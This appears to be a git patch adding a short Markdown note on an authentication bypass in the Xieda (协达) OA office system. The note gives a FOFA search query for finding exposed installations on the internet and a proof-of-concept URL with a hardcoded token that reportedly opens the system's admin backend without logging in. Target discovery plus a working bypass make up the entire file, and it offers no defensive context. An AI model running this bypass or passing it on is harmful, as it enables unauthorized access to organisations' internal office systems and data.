From 66b425c54b74319efaca20832e5526e446ec1837 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 28 Mar 2024 19:28:22 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=8D=8F=E8=BE=BEOA=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?=E7=BB=95=E8=BF=87=E7=99=BB=E5=BD=95=E8=AE=A4=E8=AF=81=E7=99=BB?= =?UTF-8?q?=E9=99=86=E5=90=8E=E5=8F=B0.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 协达OA系统绕过登录认证登陆后台.md | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 协达OA系统绕过登录认证登陆后台.md diff --git a/协达OA系统绕过登录认证登陆后台.md b/协达OA系统绕过登录认证登陆后台.md new file mode 100644 index 0000000..43a5a8e --- /dev/null +++ b/协达OA系统绕过登录认证登陆后台.md @@ -0,0 +1,11 @@ +## 协达OA系统绕过登录认证登陆后台 + +## fofa +``` +body="/interface/CheckLoginName.jsp" +``` + +## poc +``` +http://ip/stylei/MainPage.jsp?token=YXR-YMD-SYQ-TOKEN +```